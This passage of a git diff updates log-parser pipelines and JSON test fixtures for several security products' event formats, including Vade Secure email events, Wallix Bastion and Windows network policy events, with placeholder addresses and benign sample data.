"local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json new file mode 100644 index 000000000..679e24c56 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json @@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + "filename": "image001.jpg", + "id": "12345678901234567890" + } + ], + "auth_results_details": { + "dkim": "fail", + "dmarc": "none", + "spf": "temperror" + }, + "from_header": "John DOE ", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan Smithee ", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/Veeam/veeam_backup/ingest/parser.yml b/Veeam/veeam_backup/ingest/parser.yml index 5470c716c..7054d0a51 100644 --- a/Veeam/veeam_backup/ingest/parser.yml +++ b/Veeam/veeam_backup/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.UserName}}" output_field: user pattern: '%{GREEDYDATA:domain}\\%{GREEDYDATA:name}' diff --git a/Wallix/wallix-bastion/ingest/parser.yml b/Wallix/wallix-bastion/ingest/parser.yml index ed76d3f43..d9f1be434 100644 --- a/Wallix/wallix-bastion/ingest/parser.yml +++ b/Wallix/wallix-bastion/ingest/parser.yml @@ -2,6 +2,7 @@ name: wallix-bastion ignored_values: ["-"] pipeline: - name: parsed_event + filter: '{{not original.message.startswith("pam_unix(")}}' external: name: kv.parse-kv properties: diff --git a/Wallix/wallix-bastion/tests/cron.json b/Wallix/wallix-bastion/tests/cron.json index da4487e2e..fdb9da3bc 100644 --- a/Wallix/wallix-bastion/tests/cron.json +++ b/Wallix/wallix-bastion/tests/cron.json @@ -15,7 +15,6 @@ }, "user": { "name": "root" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/pam_unix.json b/Wallix/wallix-bastion/tests/pam_unix.json index 5dd28b147..d7ce961b4 100644 --- a/Wallix/wallix-bastion/tests/pam_unix.json +++ b/Wallix/wallix-bastion/tests/pam_unix.json @@ -15,7 +15,6 @@ }, "user": { "name": "wabuser" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/rexec.json b/Wallix/wallix-bastion/tests/rexec.json deleted file mode 100644 index 14e87bd1a..000000000 --- a/Wallix/wallix-bastion/tests/rexec.json +++ /dev/null @@ -1,12 +0,0 @@ -{ - "input": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation" - }, - "expected": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation", - "event": { - "provider": "sshd" - }, - "wallix": {} - } -} \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file diff --git a/WatchGuard/watchguard-firebox/ingest/parser.yml b/WatchGuard/watchguard-firebox/ingest/parser.yml index 23bdfd0d6..36e32c512 100644 --- a/WatchGuard/watchguard-firebox/ingest/parser.yml +++ b/WatchGuard/watchguard-firebox/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: message pattern: "%{DHCP}|%{USER_LOG}" diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 988ae3dbc..80474d3ce 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -24,6 +24,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Message}}" output_field: result value_sep: ":" @@ -35,6 +36,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: "=" @@ -46,6 +48,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: ":" @@ -84,6 +87,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.IpAddress}}" output_field: event pattern: "%{GREEDYDATA}%{IPV4:ip}%{GREEDYDATA}" @@ -94,6 +98,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_message_kv.result.Contents}}" output_field: event pattern: >- @@ -105,6 +110,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.url or json.event.RemoteName}}" output_field: event pattern: >- @@ -116,6 +122,7 @@ pipeline: name: grok.match description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format. properties: + raise_errors: false input_field: '{{json.event.ContextInfo.replace(" "," ").replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: "%{CONTEXTINFO_FR}|%{CONTEXTINFO_EN}" @@ -128,6 +135,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: result pattern: >- @@ -139,6 +147,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: >- @@ -153,8 +162,7 @@ pipeline: - name: set_file - name: set_user - name: process_ids - - name: source_ip - - name: source_address + - name: set_source_fields - name: action_outcome - name: set_dll filter: "{{ json.event.SourceName == 'Microsoft-Windows-Sysmon' and json.event.EventID == 7}}" @@ -165,6 +173,8 @@ pipeline: - name: dns_fields - name: action_target - name: destination + - name: set_network_policy_fields + filter: "{{ json.event.SourceName == 'Microsoft-Windows-Security-Auditing' and json.event.EventID in [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280]}}" - name: rule - name: finalize @@ -1106,7 +1116,7 @@ stages: action.outcome: "failure" filter: "{{json.event.EventType == 'AUDIT_FAILURE' }}" - source_ip: + set_source_fields: actions: - set: source.ip: "{{json.event.SourceIp or json.event.SourceAddress}}" @@ -1131,8 +1141,6 @@ stages: - set: source.ip: "{{source_ip_ip_address.event.ip}}" - source_address: - actions: - set: source.address: "{{json.event.SourceIp}}" filter: "{{json.event.SourceIp | is_ipaddress}}" @@ -1153,6 +1161,17 @@ stages: source.address: "{{json_event.message.SourceAddr}}" filter: "{{json.event.SourceAddr | is_ipaddress}}" + set_network_policy_fields: + actions: + - set: + source.ip: "{{ json.event.CallingStationID }}" + filter: "{{json.event.CallingStationID | is_ipaddress}}" + - set: + source.mac: "{{ json.event.CallingStationID }}" + filter: "{{ final.source.ip == null }}" + - set: + destination.domain: "{{ json.event.AuthenticationServer }}" + rule: actions: - set: diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json index 4a3212af2..20213504d 100644 --- a/Windows/windows/tests/Event_6272.json +++ b/Windows/windows/tests/Event_6272.json @@ -42,6 +42,14 @@ "record_id": 1674356873, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json index 8ad5a2226..118cf2445 100644 --- a/Windows/windows/tests/Event_6273.json +++ b/Windows/windows/tests/Event_6273.json @@ -42,6 +42,14 @@ "record_id": 783949626, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json index af1d9fe1d..3135f15c9 100644 --- a/Windows/windows/tests/process_6272.json +++ b/Windows/windows/tests/process_6272.json @@ -42,6 +42,11 @@ "record_id": 2324634, "type": "Security" }, + "destination": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "size_in_char": 7 + }, "host": { "hostname": "test", "name": "test" @@ -63,12 +68,20 @@ }, "related": { "hosts": [ + "1.2.3.4", "test" ], + "ip": [ + "10.24.25.25" + ], "user": [ "testUser" ] }, + "source": { + "address": "10.24.25.25", + "ip": "10.24.25.25" + }, "user": { "domain": "NT01", "id": "S-1-5-21-1111111111-111111111-1111111111-1111", diff --git a/WithSecure/withsecure-elements/ingest/parser.yml b/WithSecure/withsecure-elements/ingest/parser.yml index 83bd21cff..3f8525c4d 100644 --- a/WithSecure/withsecure-elements/ingest/parser.yml +++ b/WithSecure/withsecure-elements/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.details.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" @@ -25,6 +26,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})"